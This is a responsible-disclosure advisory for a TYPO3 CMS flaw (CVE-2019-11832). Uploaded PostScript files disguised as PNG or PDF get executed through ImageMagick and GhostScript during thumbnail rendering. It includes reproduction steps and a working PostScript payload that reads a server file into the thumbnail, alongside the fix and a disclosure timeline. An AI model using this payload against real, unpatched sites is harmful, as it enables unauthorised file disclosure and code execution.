ADVISORIES
CVE-2019-11832
The following (slightly modified) advisory was sent to the TYPO3 security team (security@typo3.org) on 28th January 2019.
The final security patch was released on 7th May 2019 in TYPO3 release 9.5.6 / 8.7.25, a SA from TYPO3 can be found here: https://typo3.org/security/advisory/typo3-core-sa-2019-012/.
Background
In January 2019 @jensvoid held a lecture at Ruhr-University Bochum about his PostScript related research and how to pwn the web using this ancient language. After his talk I did some private research - and stumbled over the following security issue in TYPO3.
Advisory
It has been discovered, that TYPO3 CMS is vulnerable to arbitrary code execution using PostScript.
- Affected Versions <= 9.5.5
Problem Description
PostScript is a turing complete page description language. Due to the use of ImageMagick, an attacker is able to upload PostScript files (covered as PNG or PDF file). As a result, he is able to execute arbitrary PostScript Code.
Technical details
When creating Thumbnails using ImageMagick methods, the library itself determines the format of the input, which may vary from the developer’s expectation. As it is in the nature of PostScript, it has to be interpreted in order to print the contents of a file. As a result, if the attacker manages to pass PostScript to ImageMagic, his code is executed on the webserver.
In the following examples the rendered preview of files in the backend is used to demonstrate the vulnerability.
Steps to reproduce
0) Setup
- Make sure GhostScript is installed on the webserver
apt update && apt install ghostscript
- Check TYPO3 Configuration at “Environment” > “Image Processing”, make sure the “Read pdf” section does not show any errors.
- Create a file at /tmp/secret.txt in order to demonstrate code execution and file inclusion later on
- We use the following file for our test. IMPORTANT: Save it with .pdf and .png as file extension!
Disclaimer: The following PS code was modified from https://lamehackersguide.blogspot.com/2017/02/weaponizing-postscript.html
%!PS
/infile (\/tmp\/secret.txt) (r) file def % open file
/buff 128 string def % buffer for reading
/Courier 30 selectfont % name and size of font
/LM 10 def % x coord
/ypos 700 def % y coord
LM ypos moveto
{ % loop
infile buff readstring % read chars to the buffer
{ %ifelse
buff cvs show % write the chars to the document
}{ %else
buff cvs show
infile closefile % close file pointer
exit % exit the loop
} ifelse
} bind loop
showpage
1) Filelist Module
- Upload the test file attached (or embedded above) via file upload in the File List Module
- Display details - there should be rendered preview thumbnail
- The thumbnail contains the contents from /tmp/secret.txt
2) Content Elements
- Create a new content element (type: “Text & Media”)
- Upload the test files to the content element
- Display rendered thumbnail
3) 3rd party extensions
Potentially every third party extension that enables file uploads and/or renders this kind of thumbnails in the backend or frontend may be vulnerable. File uploads in forms may increase the attack surface to non-authenticated users.
Fix
The ImageMagick wrapper has to handle the inputs carefully, and must not pass unsafe PostScript to the ImageMagick layer. This functionality seems to be implemented in TYPO3\CMS\Core\Imaging\GraphicalFunctions.php.
In addition to that, GhostScript (which is used by ImageMagick internally) MUST run sandboxed.
Hint: The actual patch can be reviewed in this commit: https://github.com/TYPO3/TYPO3.CMS/commit/e845d90b82b2f72ab12a9e37f15082297832beca
Further Reading
The severity could become even higher, as in the last months several GhostScript CVEs appeared and there is active research in this field. E.g:
- Privilege Escalation using PostScript in GhostScript: CVE-2018-19409
- For further reading on PostScript: https://hacking-printers.net/wiki/index.php/Main_Page
- Awesome resources on hacking the web using PostScript (@jensvoid): https://www.springerprofessional.de/en/postscript-undead-pwning-the-web-with-a-35-years-old-language/16103774
Responsible Disclosure
TYPO3 core member Oliver Hader (@ohader) received this advisory and fixed the security flaw.
- 28th January 2019: Initial Report to security@typo3.org
- 28th January 2019: First response by Oliver Hader security@typo3.org, Ticket#201901285760000013, follow-up questions
- 28th January 2019: Follow-up questions are answered.
- 30th January 2019: Oliver Hader security@typo3.org: Investigations on Image Magick Policies
- 15th February 2019: Follow-up Information and more test cases are sent to security@typo3.org
- 18th March 2019: Heads-up, question current status
- 18th March 2019: Oliver Hader security@typo3.org: Patch is currently reviewed and tested, O.H. asks for my Github account.
- 10th - 12th April: Oliver Hader security@typo3.org provides patch file which is reviewed and the patch is successfully retested
- 7th May 2019: TYPO3 Security Update is released: https://github.com/TYPO3/TYPO3.CMS/releases/tag/v9.5.6